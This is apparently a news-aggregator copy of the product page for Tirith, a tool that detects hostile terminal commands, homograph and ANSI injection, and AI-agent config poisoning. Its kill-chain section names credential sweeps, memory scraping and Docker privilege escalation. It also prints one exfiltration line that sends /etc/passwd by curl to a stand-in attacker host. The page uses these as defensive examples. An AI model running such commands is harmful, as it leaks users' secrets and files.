{"slug": "tirith-detect-terminal-injection-homograph-and-pipe-to-shell-attacks", "title": "Tirith – Detect terminal injection, homograph, and pipe-to-shell attacks", "summary": "Tirith, a new terminal security tool, intercepts commands and pastes to detect homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, and 200+ other threats in under 1ms. It covers 208 detection rules across 29 threat categories, targeting terminal and AI-agent attack surfaces, and can intercept 5 of 6 kill chain stages in supply chain attacks.", "body_md": "# Your browser would catch this.\n\nYour terminal won't.\n\nTirith intercepts commands and pastes in your terminal, detecting homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, data exfiltration, and 200+ other threats, in under 1ms.\n\n## See It In Action\n\nClick a scenario to see how Tirith responds.\n\n## What It Catches\n\n208 detection rules across 29 threat categories, covering every angle of terminal and AI-agent attack surface.\n\n### Hostname & Homograph\n\nHomograph attacks, punycode, confusable characters, IDN spoofing\n\n### Terminal Injection\n\nANSI escapes, bidi overrides, zero-width and control characters\n\n### Command Execution\n\nPipe-to-shell, decode-execute, command substitution, and dangerous invocations\n\n### Credential Detection\n\nAPI keys, tokens, private keys, and high-entropy secrets in input\n\n### Supply Chain & Ecosystem\n\nGit, Docker, pip, npm, registries — package and supply-chain attack surface\n\n### Config Security\n\nAI config poisoning, prompt injection, and MCP server validation\n\n### AI Config Drift\n\nSnapshot-diff changes to AI configs: hidden instructions and tool-use escalation\n\n### Threat Intelligence\n\nKnown-malicious packages, URLs, and IPs from the signed threat database\n\n### Code Execution\n\nExecuting from tmp/untrusted locations and dynamic or obfuscated execution\n\n### Contextual Safety\n\nProduction cloud/k8s, labeled SSH hosts, IaC apply/destroy, and container exec\n\n### Hidden Content\n\nHidden CSS/color text, comments, and notebook/HTML hidden instructions\n\n### Cloaking\n\nServers returning different content to AI bots vs browsers\n\n## Supply Chain Is the New Attack Surface\n\nTeamPCP compromised LiteLLM, Aqua Trivy, and Checkmarx in 5 days. No zero-day needed, just stolen credentials and commands your terminal happily executed.\n\nTirith won't stop a trojaned package from being installed. But it catches the payload before it does damage, cutting the blast radius at every stage of the kill chain.\n\n### Initial Access\n\nAttack\n\nStolen credentials used to push trojaned package\n\nLiteLLM, Aqua Trivy, Checkmarx, all in 5 days\n\nTirith Response\n\nOutside terminal scope. Tirith guards what runs after install.\n\n### Credential Harvesting\n\nAttack\n\nPayload exports API keys, tokens, and secrets from env vars\n\n$AWS_SECRET_ACCESS_KEY, $GITHUB_TOKEN, $ANTHROPIC_API_KEY\n\nTirith Response\n\nsensitive_env_export\n\n### Memory Scraping\n\nAttack\n\nReads /proc/*/mem to extract secrets from running processes\n\nEvery secret in your CI runner or dev machine memory\n\nTirith Response\n\nproc_mem_access\n\n### Privilege Escalation\n\nAttack\n\nMounts host root filesystem via Docker remote daemon\n\nFull host access from inside a container\n\nTirith Response\n\ndocker_remote_priv_esc\n\n### Persistence\n\nAttack\n\nSweeps .aws/credentials, .ssh/id_rsa, .gnupg/ for lateral movement\n\nEvery credential file on disk\n\nTirith Response\n\ncredential_file_sweep\n\n### Exfiltration\n\nAttack\n\nUploads stolen data to attacker-controlled server via curl\n\ncurl -d @/etc/passwd https://c2.attacker.com/collect\n\nTirith Response\n\ndata_exfiltration\n\n5 of 6 kill chain stages intercepted\n\nTirith can't prevent a compromised package from being published. But every post-install payload (credential theft, memory scraping, privilege escalation, exfiltration) gets caught before it does damage. That's the difference between a breach and a blocked command.\n\n## How It Works\n\nA 3-tier pipeline that balances speed with thoroughness.\n\n### Fast Gate\n\nRegex-powered initial filter eliminates 99% of clean commands instantly.\n\n### Extract\n\nParses URLs, Docker references, and package identifiers from complex commands.\n\n### Analyze\n\n200+ rules across 29 categories: homographs, injection, supply-chain, threat intel, credential detection, AI-config drift, and more.\n\n## AI Agent Security\n\nProtect AI coding agents at every layer, from the configs they read to the skills they download to the commands they execute. One command to set up. Zero friction on clean input.\n\n### MCP Server: 7 Tools\n\nAI agents call these tools before taking action. Run `tirith mcp-server`\n\nto start.\n\ntirith_check_command\n\nAnalyze shell commands\n\ntirith_check_url\n\nScore URLs for attacks\n\ntirith_check_paste\n\nCheck pasted content\n\ntirith_scan_file\n\nScan files for hidden content\n\ntirith_scan_directory\n\nRecursive directory scan\n\ntirith_verify_mcp_config\n\nValidate MCP configs\n\ntirith_fetch_cloaking\n\nDetect server-side cloaking\n\n#### Skill & Plugin Scanning\n\nDownload skills, plugins, and MCP tools without worrying. Tirith scans every file for obfuscated payloads, dynamic code execution, and secret exfiltration before your agent runs it.\n\n#### Config Poisoning\n\nScans 50+ AI config file patterns (.cursorrules, CLAUDE.md, .mcp.json, and more) for prompt injection, invisible Unicode, and permission bypass attempts.\n\n#### Hidden Content\n\nDetects content invisible to humans but readable by AI: CSS hiding, color tricks, sub-pixel PDF text, and HTML comment injection.\n\n#### Server Cloaking\n\nCompares responses across 6 user-agents to catch servers that serve different content to AI bots vs browsers.\n\n#### AI Config Drift\n\nSnapshot your AI configs, then diff to catch hidden instructions or tool-use escalation slipped in since — via tirith ai snapshot and tirith ai diff.\n\n#### Editor Diagnostics (LSP)\n\ntirith lsp publishes findings inline in your editor as you open and edit AI configs, install docs, and source files.\n\n### One Command Setup\n\n## Commands\n\nEverything runs locally. Zero network calls unless you explicitly ask.\n\nAnalyze\n\n| tirith check -- <cmd> | Analyze a command without executing it |\n| tirith paste | Check pasted content (auto-called by shell hooks) |\n| tirith scan [path] | Scan files/dirs for hidden content, config poisoning, malicious code. Supports --sarif and --ci --fail-on high |\n| tirith run <url> | Safe curl|bash replacement. Downloads, analyzes, shows SHA256, opens for review, executes after confirmation |\n| tirith explain --rule <id> | Docs, examples, and remediation for any of the 200+ rule IDs |\n\nInvestigate\n\n| tirith score <url> | Break down a URL's trust signals |\n| tirith diff <url> | Byte-level comparison showing where suspicious characters hide |\n| tirith fetch <url> | Detect server-side cloaking (different content for bots vs browsers) |\n| tirith why | Explain the last rule that triggered |\n\nAI & Editor\n\n| tirith ai | Snapshot and diff AI configs for hidden-instruction & tool-use drift (scan, diff, quarantine, snapshot) |\n| tirith lsp | Language Server for inline editor diagnostics as you edit configs, docs, and code |\n| tirith mcp-server | Run as MCP server over JSON-RPC stdio (7 tools) |\n| tirith setup <tool> | One-command setup for Claude Code, Codex, Cursor, VS Code, Windsurf |\n| tirith gateway run | MCP gateway proxy for intercepting AI agent shell tool calls |\n\nPolicy & Trust\n\n| tirith onboard | Detect your repo and environment, then recommend a policy template |\n| tirith policy | Scaffold, validate, test, and tune .tirith/policy.yaml (init, validate, test, tune) |\n| tirith rule | Author custom regex or semantic when:-DSL detection rules (test, validate, explain) |\n| tirith trust | Manage trusted patterns, narrow + 30-day TTL by default (add, list, explain, gc) |\n| tirith threat-db | Update and query the signed threat database (update, status, explain, sources) |\n\nOperate\n\n| tirith receipt | Track and verify scripts run through tirith run (last, list, verify) |\n| tirith checkpoint | Snapshot files before risky operations, roll back if needed (create, restore, diff) |\n| tirith dashboard | Local security dashboard from the audit log (export, serve) |\n| tirith audit | Audit log management for compliance (export, stats, report) |\n| tirith doctor | Diagnostics for hooks, policy, and setup (--quick, --fix, --compat) |\n| tirith init | Print the shell hook for your shell profile |\n\n## Free for Everyone. Built for Teams.\n\nAll detection rules run at every tier. Paid plans add compliance, policy distribution, and enterprise integrations.\n\n### Community\n\nFree forever\n\nEverything you need for terminal security. No account required.\n\n- ✓Full detection engine (all 200+ rules)\n- ✓Shell hooks: Bash, Zsh, Fish, PowerShell\n- ✓MCP server for AI coding tools\n- ✓Local JSONL audit log\n- ✓YAML policy system\n- ✓SARIF output for CI/CD\n- ✓Zero network calls, fully offline\n- ✓Cross-platform: macOS, Linux, Windows\n- ✓Open source\n\n### Team / Enterprise\n\nContact us\n\nEverything in Community, plus:\n\n- MITRE ATT&CK technique mapping\n- Remote policy distribution\n- Centralized audit log collection\n- Custom DLP redaction patterns\n- Webhooks: Slack, Teams, PagerDuty\n- SSO/SAML: Okta, Azure AD\n- Air-gapped / on-premises deployment\n- Dedicated account manager & SLA\n\n## Installation\n\nInstall Tirith with your favorite package manager.\n\n```\nbrew install sheeki03/tap/tirith\n```\n\n### Shell Activation\n\n```\n# zsh (~/.zshrc)\neval \"$(tirith init --shell zsh)\"\n\n# bash (~/.bashrc)\neval \"$(tirith init --shell bash)\"\n\n# fish (~/.config/fish/config.fish)\ntirith init --shell fish | source\n\n# PowerShell ($PROFILE)\n# tirith init --shell powershell | Invoke-Expression\n```\n\n", "url": "https://wpnews.pro/news/tirith-detect-terminal-injection-homograph-and-pipe-to-shell-attacks", "canonical_source": "https://tirith.sh/", "published_at": "2026-06-19 07:17:52+00:00", "updated_at": "2026-06-19 07:30:54.275641+00:00", "lang": "en", "topics": ["ai-safety", "ai-agents"], "entities": ["Tirith", "LiteLLM", "Aqua Trivy", "Checkmarx", "TeamPCP"], "alternates": {"html": "https://wpnews.pro/news/tirith-detect-terminal-injection-homograph-and-pipe-to-shell-attacks", "markdown": "https://wpnews.pro/news/tirith-detect-terminal-injection-homograph-and-pipe-to-shell-attacks.md", "text": "https://wpnews.pro/news/tirith-detect-terminal-injection-homograph-and-pipe-to-shell-attacks.txt", "jsonld": "https://wpnews.pro/news/tirith-detect-terminal-injection-homograph-and-pipe-to-shell-attacks.jsonld"}}